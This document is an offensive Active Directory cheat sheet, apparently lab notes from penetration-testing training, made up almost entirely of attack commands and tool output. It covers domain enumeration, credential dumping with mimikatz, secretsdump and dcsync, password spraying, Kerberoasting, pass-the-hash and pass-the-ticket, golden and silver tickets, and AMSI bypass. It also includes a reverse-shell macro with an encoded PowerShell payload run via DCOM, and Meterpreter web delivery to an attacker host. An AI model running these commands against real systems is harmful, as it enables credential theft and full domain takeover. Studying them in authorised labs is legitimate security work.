ActiveDirectory
Active Directory 
Enumeration
net user /domain
net user adminjeff /domain
net group /domain
net accounts
net use # unidades mapeadas
net share # unidades compartidas
klist # tickets
whoami /groups
setspn -T corp.com -Q */* # service accounts
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry($SearchString, "corp.com\offsec", "lab")
$Searcher.SearchRoot = $objDomain
$Searcher.filter="operatingSystem=Windows 10*"
$Searcher.FindAll()
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$SearchString
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry($SearchString, "corp.com\offsec", "lab")
$Searcher.SearchRoot = $objDomain
$Searcher.filter="(&(objectClass=Group)(member=*))"
$groups = $Searcher.FindAll()
Foreach($group in $groups)
{
$group.Properties.name
$group.Properties.member
Write-Host "`n"
}
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry($SearchString, "corp.com\offsec", "lab")
$Searcher.SearchRoot = $objDomain
$Searcher.filter="serviceprincipalname=*http*"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
Foreach($prop in $obj.Properties)
{
$prop
}
}
LDAPsearch
nmap -n -sV --script "ldap* and not brute" 192.168.164.122
ldapsearch -LLL -x -H ldap://pathfinder.htb -b '' -s base '(objectClass=*)'
ldapsearch -v -x -b "DC=hutch,DC=offsec" -H "ldap://192.168.164.122" "(objectclass=*)"
powershell -ep bypass
. .\PowerView.ps1
Get-Domain
Get-DomainSID
Get-DomainPolicy
Get-DomainController
(Get-DomainPolicy)."SystemAccess"
(Get-DomainPolicy)."kerberospolicy"
Get-DomainUser
Get-DomainUser | select cn
Get-DomainUser -Identity Jeff_Admin
Get-NetLoggedon -ComputerName machine0001
Get-NetSession -ComputerName dc01
Get-LastLoggedOn -ComputerName client251.corp.com
Get-NetComputer| select name
Get-NetComputer -OperatingSystem "*Server 2016*" | select name ,operatingsystem |Format-List
Get-NetComputer | select samaccountname, operatingsystem
Get-NetGroup | select name
Get-NetGroup 'Domain Admins'
Get-NetGroup "*admin*"| select name
Get-NetGroup -UserName <USER>
Get-NetGroupMember "Domain Admins"
Invoke-ShareFinder -Verbose
Get-NetShare
Find-DomainShare
Find-DomainShare -CheckShareAccess
Get-NetGPO
Get-NetGPO| select displayname
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}
Get-NetGPO -ComputerName <ComputerName> | select displayname
Get-GPPermission -Guid 31B2F340-016D-11D2-945F-00C04FB984F9 -TargetType User -TargetName anirudh
Get-NetDomainTrust
Get-NetDomainTrust -Domain <domain>
Get-DomainTrustMapping
Get-NetForest
Get-NetForest -Forest <forest>
Get-NetForestDomain
Get-NetForestDomain -Forest karim.net
Get-NetForestCatalog
Get-NetForestCatalog -Forest <forest>
Credentials
SAM
#windows
reg save HKLM\sam C:\sam
reg save HKLM\system C:\system
#kali
impacket-secretsdump -system system -sam sam local
samdump2 system sam
privilege::debug
token::elevate
lsadump::sam
lsadump::lsa /patch
#Cache
sekurlsa::logonpasswords
sekurlsa::tickets
Import-Module .\Invoke-PowerDump.ps1
Invoke-PowerDump
crackmapexec smb 192.168.224.0/24 -u Administrator -p lab --sam
john hash.txt -w=/opt/SecLists/Passwords/Leaked-Databases/rockyou.txt --format=NT
NTDS.dit
crackmapexec smb 192.168.0.200 -u Administrator -p Adminpassw0rd --ntds drsuapi
impacket-secretsdump spookysec.local/backup:backup2517860@10.10.92.76
#DomainController
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
#Kali
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
Spraying
Spray-Passwords.ps1 -Pass Qwerty09! -Admin
Spray-Passwords.ps1 -File .\words.txt -Admins
crackmapexec smb 192.168.224.0/24 -u users.txt -p Summer18
crackmapexec smb 192.168.224.0/24 -u Administrator -p lab
Attack
Kerberoast
1. Locate Service Account
setspn -T corp.com -Q */*
2. Request Ticket(s) One ticket:
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/CorpWebServer.corp.com"
#Request All Tickets
Add-Type -AssemblyName System.IdentityModel
setspn.exe -T corp.com -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
3. Extract
mimikatz # kerberos::list /export
4. Convert for john
kirbi2john.py * > hash
5. Crack
john --format=krb5tgs --wordlist=words.txt hash
Get-NetUser -SPN
Get-NetUser -SPN | select userprincipalname
Invoke-Kerberoast
Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast
Request-SPNTicket MSSQLSvc/CorpSqlServer.corp.com:1433
impacket-GetUserSPNs controller.local/Machine1:Password1 -dc-ip 10.10.154.51 -request -outputfile hash
$search = New-Object DirectoryServices.DirectorySearcher([ADSI]"")
$search.filter = "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))"
$results = $search.Findall()
foreach($result in $results)
{
$userEntry = $result.GetDirectoryEntry()
Write-host "User : " $userEntry.name "(" $userEntry.distinguishedName ")"
Write-host "SPNs"
foreach($SPN in $userEntry.servicePrincipalName)
{
$SPN
}
Write-host ""
}
Rubeus.exe kerberoast
Rubeus.exe kerberoast /outfile:hashes.txt
ASReproasting
impacket-GetNPUsers spookysec.local/ -no-pass -usersfile validusers.txt -format hashcat -outputfile resultasreproast.txt
john -w=passwordlist.txt resultasreproast.txt
Rubeus.exe asreproast
Lateral Movement
Pass The Hash
crackmapexec smb 192.168.224.10 -u Administrator -H '2892d26cdf84d7a70e2eb3b9f05c425e' -x ipconfig
pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //192.168.224.10 cmd
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e Administrator@192.168.224.10
smbclient.py -hashes aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e corp.com/Administrator@192.168.224.10
evil-winrm -i 10.11.1.128 -u Administrator -H '6ff0e850285bca4d438247a627b28201
wmiexec.py dj/Administrator@10.11.1.128 -hashes 'aad3b435b51404eeaad3b435b51404ee:6ff0e850285bca4d438247a627b28201'
#enable RDP
crackmapexec smb 127.0.0.1 -u alice -H 'b74242f37e47371aff835a6ebcac4ffe' -x 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
crackmapexec smb 127.0.0.1 -u alice -H 'b74242f37e' -M rdp -o action=enable
1. First need enable Restricted Admin Mode
crackmapexec smb 10.11.1.24 -u Administrator -H 'ee0c207898a5bccc01f38115019ca2fb' --local-auth -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f'
2. Connect with xfreerdp
xfreerdp /cert-ignore /compression /auto-reconnect /dynamic-resolution /v:10.11.1.24 /u:Administrator /pth:ee0c207898a5bccc01f38115019ca2fb
Overpass The Hash
c:\>runas "/user:corp.com\jeff_admin" "c:\Windows\notepad.exe"
Enter the password for corp.com\jeff_admin: lab
Attempting to start c:\Windows\notepad.exe as user "corp.com\jeff_admin" ...
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 1314193 (00000000:00140d91)
Session : Interactive from 0
User Name : jeff_admin
Domain : corp
Logon Server : DC01
Logon Time : 4/22/2022 5:28:20 PM
SID : S-1-5-21-4038953314-3014849035-1274281563-1104
msv :
[00000003] Primary
* Username : jeff_admin
* Domain : corp
* NTLM : 2892d26cdf84d7a70e2eb3b9f05c425e
* SHA1 : a188967ac5edb88eca3301f93f756ca8e94013a3
* DPAPI : d9f056fbcdea51fa473f063395fd3559
mimikatz # sekurlsa::pth /user:jeff_admin /domain:corp.com /ntlm:2892d26cdf84d7a70e2eb3b9f05c425e /run:PowerShell.exe
user : jeff_admin
domain : corp.com
program : PowerShell.exe
impers. : no
NTLM : 2892d26cdf84d7a70e2eb3b9f05c425e
| PID 4640
| TID 5284
| LSA Process is now R/W
| LUID 0 ; 1374776 (00000000:0014fa38)
\_ msv1_0 - data copy @ 02CD9224 : OK !
\_ kerberos - data copy @ 02CD9048
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace -> null
PS C:\Windows\system32> net use \\dc01
The command completed successfully.
PS C:\Windows\system32> klist
Current LogonId is 0:0x14fa38
Cached Tickets: (3)
#2> Client: jeff_admin @ CORP.COM
Server: cifs/dc01 @ CORP.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 4/22/2022 17:32:33 (local)
End Time: 4/23/2022 3:32:33 (local)
Renew Time: 4/29/2022 17:32:33 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: DC01.corp.com
PS C:\Windows\system32> C:\Tools\active_directory\PsExec.exe \\dc01 cmd.exe
C:\Windows\system32>whoami
corp\jeff_admin
Pass the ticket
privilege::debug
sekurlsa::tickets /export
#locate Admin@krbtgt ticket
kerberos::ptt 0-40e10000-Administrator@krbtgt~CONTROLLER.LOCAL-CONTROLLER.LOCAL.kirbi
klist
dir \\MACHINE\admin$
PsExec.exe \\MACHINE cmd.exe
Silver Ticket
c:\Users\offsec\Desktop>whoami /user
USER INFORMATION
----------------
User Name SID
=========== ==============================================
corp\offsec S-1-5-21-4038953314-3014849035-1274281563-1103
#`Qwerty09!` with Rubeus
C:\Users\lorka\Desktop>Rubeus.exe hash /password:Qwerty09!
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.6.4
[*] Action: Calculate Password Hash(es)
[*] Input password : Qwerty09!
[*] rc4_hmac : E2B475C11DA2A0748290D87AA966C327
[!] /user:X and /domain:Y need to be supplied to calculate AES and DES hash types!
mimikatz # kerberos::purge
Ticket(s) purge for current session is OK
mimikatz # kerberos::list
mimikatz # kerberos::golden /user:offsec /domain:corp.com /sid:S-1-5-21-4038953314-3014849035-1274281563-1103 /target:CorpWebServer.corp.com /service:HTTP /rc4:E2B475C11DA2A0748290D87AA966C327 /ptt
User : offsec
Domain : corp.com (CORP)
SID : S-1-5-21-4038953314-3014849035-1274281563-1103
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: e2b475c11da2a0748290d87aa966c327 - rc4_hmac_nt
Service : HTTP
Target : CorpWebServer.corp.com
Lifetime : 4/24/2022 9:02:18 AM ; 4/21/2032 9:02:18 AM ; 4/21/2032 9:02:18 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'offsec @ corp.com' successfully submitted for current session
Golden Ticket
C:\Users\jeff_admin>whoami /user
USER INFORMATION
----------------
User Name SID
=============== ==============================================
corp\jeff_admin S-1-5-21-4038953314-3014849035-1274281563-1104
For mimikatz our SID is: S-1-5-21-4038953314-3014849035-1274281563
mimikatz # lsadump::lsa /patch /name:krbtgt
Domain : corp / S-1-5-21-4038953314-3014849035-1274281563
RID : 000001f6 (502)
User : krbtgt
LM :
NTLM : fc274a94b36874d2560a7bd332604fab
mimikatz # kerberos::purge
Ticket(s) purge for current session is OK
mimikatz # kerberos::list
mimikatz # kerberos::golden /user:hackeruser /domain:corp.com /sid:S-1-5-21-4038953314-3014849035-1274281563 /krbtgt:fc274a94b36874d2560a7bd332604fab /ptt
User : hackeruser
Domain : corp.com (CORP)
SID : S-1-5-21-4038953314-3014849035-1274281563
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: fc274a94b36874d2560a7bd332604fab - rc4_hmac_nt
Lifetime : 4/24/2022 1:55:27 PM ; 4/21/2032 1:55:27 PM ; 4/21/2032 1:55:27 PM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'hackeruser @ corp.com' successfully submitted for current session
mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00063A24
C:\Users\jeff_admin>c:\Tools\active_directory\PsExec.exe \\dc01 cmd.exe
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
corp\hackeruser
C:\Windows\system32>hostname
DC01
Distributed Component Object
msfvenom -p windows/shell_reverse_tcp LHOST=172.16.224.10 LPORT=4444 -f hta-psh -o evil.hta
[lorka@kali officemacro]# python2.7 split.py
Str = Str + "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4Ad"
Str = Str + "ABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewA"
Str = Str + "kAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnA"
...SNIP...
Sub revshell()
Dim Str As String
Str = Str + "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4Ad"
Str = Str + "ABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewA"
...SNIP...
Shell (Str)
End Sub
C:\Users\jeff_admin>c:\Tools\practical_tools\nc.exe -lnvp 4444
listening on [any] 4444 ...
$com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application", "172.16.224.5"))
$LocalPath = "C:\Users\jeff_admin\Desktop\revshell.xlsm"
$RemotePath = "\\172.16.224.5\c$\revshell.xlsm"
[System.IO.File]::Copy($LocalPath, $RemotePath, $True)
$Path = "\\172.16.224.5\c$\Windows\sysWOW64\config\systemprofile\Desktop"
$temp = [system.io.directory]::createDirectory($Path)
$Workbook = $com.Workbooks.Open("C:\revshell.xlsm")
$com.Run("revshell")
Microsoft Windows [Version 10.0.16299.15]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Users\jeff_admin>c:\Tools\practical_tools\nc.exe -lnvp 4444
listening on [any] 4444 ...
connect to [172.16.224.10] from (UNKNOWN) [172.16.224.5] 50018
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Domain Controller Synchronization
mimikatz # lsadump::dcsync /user:Administrator
Tools
Enum4linux
enum4linux -a 10.10.148.241 # ALL
enum4linux -U 10.10.148.241 # Users
enum4linux -u administrator -p password -U 10.10.148.241 # With Creds
enum4linux -o 10.10.148.241 # OSinfo
CrackMapExec
Enumeration
crackmapexec smb ms.evilcorp.org
crackmapexec smb 192.168.1.0 192.168.0.2
crackmapexec smb 192.168.1.0-28 10.0.0.1-67
crackmapexec smb 192.168.1.0/24
crackmapexec smb targets.txt
#Domain
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --users
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --rid-brute
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --groups
#Local
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --local-users
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --local-group
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --loggedon-users
# Generate a list of relayable hosts (SMB Signing disabled)
crackmapexec smb 192.168.1.0/24 --gen-relay-list output.txt
# Enumerate available shares
crackmapexec smb 192.168.215.138 -u 'user' -p 'PASSWORD' --local-auth --shares
# Get the active sessions
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --sessions
# Check logged in users
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --lusers
# Get the password policy
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --pass-pol
crackmapexec smb 192.168.10.1 -u "" -p ""
crackmapexec smb 10.10.10.161 -u '' -p ''
crackmapexec smb 10.10.10.161 --pass-pol
crackmapexec smb 10.10.10.161 --users
crackmapexec smb 10.10.10.161 --groups
#anonymous
crackmapexec smb 10.10.10.178 -u 'a' -p ''
crackmapexec smb 192.168.10.1 -u 'user' -p 'PASSWORD' --shares
crackmapexec smb 192.168.10.1 -u 'user' -p 'PASSWORD' --disks
Authentication
crackmapexec smb 192.168.215.138 -u 'User' -p 'Pass'
crackmapexec smb 172.16.157.0/24 -u administrator -H 'NTHASH'
crackmapexec smb 192.168.215.138 -u 'Administrator' -p 'PASSWORD' --local-auth
crackmapexec smb 172.16.157.0/24 -u administrator -H 'NTHASH' --local-auth
crackmapexec smb 192.168.100.0/24 -u "admin" -p "password1"
crackmapexec smb 192.168.100.0/24 -u "admin" -p "password1" "password2"
crackmapexec smb 192.168.100.0/24 -u "admin1" "admin2" -p "P@ssword"
crackmapexec smb 192.168.100.0/24 -u user_file.txt -p pass_file.txt
crackmapexec smb 192.168.100.0/24 -u user_file.txt -H ntlm_hashFile.txt
Execution
# CrackMapExec has 3 different command execution methods (in default order) :
# - wmiexec --> WMI
# - atexec --> scheduled task
# - smbexec --> creating and running a service
# Execute command through cmd.exe (admin privileges required)
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x 'whoami'
# Force the smbexec method
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' -x 'net user Administrator /domain' --exec-method smbexec
# Execute commands through PowerShell (admin privileges required)
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X 'whoami'
# Bypass AMSI
crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' --amsi-bypass /path/payload
# Meterpreter
* On MSF instance
use exploit/multi/script/web_delivery
set SRVHOST 192.168.119.205 #kali host
set SRVPORT 8443
set target 5 #SyncAppvPublishingServer
set payload windows/meterpreter/reverse_https
set LHOST 192.168.119.205
set LPORT 443
run -j
* copy random urlagent like eYEssEwv2D on http://10.211.55.4:8080/eYEssEwv2D
* With CME
crackmapexec 192.168.10.0/24 -u username -p password -M met_inject -o SRVHOST=192.168.119.205 SRVPORT=8443 RAND=eYEssEwv2D SSL=http
Files
crackmapexec smb 10.11.1.24 -u Administrator -H 'ee0c207898a5bccc01f38115019ca2fb' --local-auth --get-file \\Users\\Administrator\\Desktop\\proof.txt proof.txt
crackmapexec smb 10.11.1.24 -u Administrator -H 'ee0c207898a5bccc01f38115019ca2fb' --local-auth --put-file test.txt \\Users\\Administrator\\Desktop\\test.txt
Credentials
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' --local-auth --sam
# Enable WDigest to get credentials from the LSA Memory
crackmapexec smb 10.11.1.123 -u Administrator -H '3fee04b01f59a1001a366a7681e95699' --local-auth -M wdigest -o ACTION=enable
# Then you juste have to wait the user logoff and logon again
# But you can force the logoff
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' -x 'quser'
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' -x 'logoff <sessionid>'
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' --lsa
crackmapexec smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
crackmapexec smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-history
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' -M lsassy
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' -M nanodump
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' -M mimikatz
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' -M mimikatz -o COMMAND='"lsadump::dcsync /domain:domain.local /user:krbtgt"
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' -M wireless
MSSQL
crackmapexec mssql 10.11.1.31 -u sa -p poiuytrewq --local-auth
crackmapexec mssql 10.11.1.31 -u sa -p poiuytrewq --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'
crackmapexec mssql 10.11.1.31 -u sa -p poiuytrewq --local-auth -x "whoami"
LDAP
crackmapexec ldap hutch.offsec -u fmcsorley -p CrabSharkJellyfish192 -M laps
crackmapexec ldap hutch.offsec -u Administrator -p 'V2%.#lQ+t72%Rx' -M user-desc
Kerbrute
check users
kerbrute userenum --dc 10.11.1.20 -d svcorp.com users.txt
kerbrute bruteuser --dc 10.10.148.241 -d spookysec.local passwordlist.txt svc-admin
kerbrute passwordspray --dc 10.10.148.241 -d spookysec.local validusers.txt management2005
Mimikatz
#general
privilege::debug
log
log customlogfilename.log
#sekurlsa
sekurlsa::logonpasswords
sekurlsa::logonPasswords full
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
#kerberos
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
#crypto
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export
#vault & lsadump
vault::cred
vault::list
token::elevate
vault::cred
vault::list
lsadump::lsa /patch
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
#pth
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
sekurlsa::pth /user:Administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe
#ekeys
sekurlsa::ekeys
#dpapi
sekurlsa::dpapi
#minidump
sekurlsa::minidump lsass.dmp
#ptt
kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi
#golden/silver
kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi
kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600 /renewmax:10080
kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi
#tgt
kerberos::tgt
#purge
kerberos::purge
# skeleton
misc::skeleton
Rubeus
harvest TGTs
Rubeus.exe harvest /interval:30
Spraying
Rubeus.exe brute /password:Password1 /noticket
BloodHound
SharpHound.exe -c ALL --zipfilename blood.zip
bloodhound-python -u 'alice@svcorp.com' -p 'ThisIsTheUsersPassword01' -ns 10.11.1.20 -d svcorp.com -dc SV-DC01.svcorp.com -c all --zip
MATCH p=(u {owned: true})-[r1]->(n) WHERE r1.isacl=true RETURN p
MATCH p=shortestPath((c {owned: true})-[*1..3]->(s)) WHERE NOT c = s RETURN p
Responder
Capture NTLM
responder -I tun0 --lm -v
LAPSdumper
#Link
https://github.com/n00py/LAPSDumper
#Use
python3 laps.py -u fmcsorley -p CrabSharkJellyfish192 -d HUTCH.OFFSEC